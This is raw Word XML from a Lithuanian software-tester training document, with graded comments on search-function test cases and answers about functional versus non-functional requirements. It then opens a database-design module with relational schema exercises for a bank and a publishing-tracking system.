          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Komentaras: Sistema pateikia tik vieną telefoną, nors &lt;Phones &amp; PDA‘s&gt; kategorijoje yra daugiau produktų. Priežastis ga</w:t>
      </w:r>
      <w:r w:rsidR="003C7A53" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>li būti netinkama produkto konfi</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>gūracija.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>- Jei į paieškos laukelį neįvedame n</w:t>
      </w:r>
      <w:r w:rsidR="00B85FE4" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ieko ir spaudžiame "Paieška" mygtuką, sistema grąžina visų</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> turimų prekių sąrašą. NOK.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Komentaras:</w:t>
      </w:r>
      <w:r w:rsidR="00B85FE4" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Nieko neįvedus į paieškos laukelį ir paspaudus paieškos mygtuką, sistema nieko nepateikia. Klaida gali būti arba reikalavimuose (netinkamai aprašyti, nesuprasti), arba implementacijoje, arba CMS paieškos modulio konfigūracijoje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>- Jei į paieškos laukelį įvedame neegzistuojačio produkto pavadi</w:t>
      </w:r>
      <w:r w:rsidR="00B85FE4" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>nimą ir spaudžiame "Paieška" my</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>gtuką, sistema pateikia pranešimą, apie tokio produkto nebuvimą. OK.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Komentaras: Bet, jei įvesime tik fragmentą, kuris atitiks kurio nors egzistuojančio produkto pavadinimo dalį, šis produktas bus atvaiduotas paieškos rezultatuose.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>- Jei paieškos rezu</w:t>
      </w:r>
      <w:r w:rsidR="00B85FE4" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ltatų yra daug, jie yra skirstom</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>i į puslapius po 10 rezultatų kiekviename puslapyje. NOK.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Komentaras: Pagal nutylėjimą, produktai nėra skirstomi puslapiais. Tačiau, turi būti patikrinti CMS paieškos modulio nustatymai. Gali būti, kad puslapiavimas yra implementuotas, tačiau neįjungtas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>- Paieškos rezultatai yra surūšiuoti abėcėlės tvarka. OK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0010346F" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NEFUNKCINIAI (TECHNINIAI, SAUGUMO) REIKALAVIMAI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Funkciniai reikalavimai testuoja sistemos funkcijas (skaičiavimus, logiką ir pan), nefunkciniai – sistemos charakteristikas (greitį, išvaizdą, saugumą ir pan.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Saugumo, našumo, atsparumo, suderinamumo, panaudojamumo, t.t.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Iš esmės, atliekant testavim</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ą su skirtingomis naršyklėmis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>, testuojame svetainės išvaizdą ir funkcionalumą įvairiose naršyklėse ir įrenginiuose. Kaip žmonės interpretuoja dalykus skirtingai, taip ir ne visos naršyklės “supranta” dalykus vienodai. Pvz. „Internet Explorer 8“ CSS stiliai gali būti skirtingi nei naujesnėse „Internet Explorer“ ir „Google Chrome“ versijose. Elegantiškas stilius ir efektai, vaizdai, šešėliai ir netgi šriftai, gali labai skirtis. Nors šiuos vaizdinius skirtumus dažnai neįmanoma panaikinti visiškai (ypač su senesnėmis naršyklėmis), testavimo su skirtingomis naršyklėmis ir įrenginiais tikslas yra užtikrinti, kad naudotojai galėtų pasiekti visą turinį ir vykdyti visas pagrindines žiniatinklio programos funkcijas be jokių svarbių problemų.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Galima matuoti puslapio našumą /užkrovimo greitį, testuoti turinio pasikeitimus, SEO žymas (angl. tags), atlikti nesudėtingą puslapio derinimą (ang. debugging).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:num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E350EA" w:rsidRPr="00AD4464" w:rsidTr="00E350EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927"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Funkciniai reikalavimai:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>b,c, d, f, h,</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Nefunkciniai reikalavimai:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>a, e, g, i, j</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D52EDD" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Reikalavimų peržiūra yra labiau</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> nefunkcinis testavimas. Funkcinis testavimas yra tiesiogiai susijęs su sistemos vykdymu. Reikalavimų peržiūra yra statinės analizės dalis, kuri nėra priskiriama prie funkcinio testavimo. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>a), b), c), d)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>c)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Panaudojamumas – tai naudotojo veiklos veiksmingumas, našumas ir jaučiamas pasitenkinimas, su kuriuo konkretus naudotojas gali pasiekti konkrečių tikslų konkrečiose aplinkose, šiuo atveju, naudodamasis mūsų sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>a)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00815BD3" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6FF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Modulis „Nesudėtingų duomenų bazių projektavimas ir kūrimas</w:t>
      </w:r>
      <w:r w:rsidR="00234342" w:rsidRPr="007D6FF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>(programinės įrangos testuotojo)</w:t>
      </w:r>
      <w:r w:rsidR="00234342" w:rsidRPr="007D6FF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D6FF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F300C8" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Kompetencija. Projektuoti tipines reliacines ir nereliacines </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">(NoSQL)  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>duomenų bazes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="937" w:name="_Toc10444019"/>
      <w:bookmarkStart w:id="938" w:name="_Toc13095566"/>
      <w:bookmarkStart w:id="939" w:name="_Toc13833460"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Pateikti reliacinės duomenų bazės schemą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="937"/>
      <w:bookmarkEnd w:id="938"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="939"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>. SUPROJEKTUOTI RELIACINĘ DUOMENŲ BAZĘ (ATVEJIS: LIETUVOS BANKAS)</w:t>
      </w:r>
      <w:r w:rsidR="00073C2B">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Suprojektuoti reliacinę duomenų bazę (atvejis: Lietuvos bankas)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Schema:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75D1612C" wp14:editId="7C89BBEF">
            <wp:extent cx="3869690" cy="3485515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23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69690" cy="3485515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>. SUPROJEKTUOTI RELIACINĘ DUOMENŲ BAZĘ (ATVEJIS: LEIDYBOS STEBĖJIMO SISTEMA)</w:t>
      </w:r>
      <w:r w:rsidR="00073C2B">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Suprojektuoti reliacinę duomenų bazę (atvejis: Leidybos stebėjimo sistema)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Schema:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AFBAFD7" wp14:editId="3495BA3A">
            <wp:extent cx="5937250" cy="2173605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="232" name="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37250" cy="2173605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
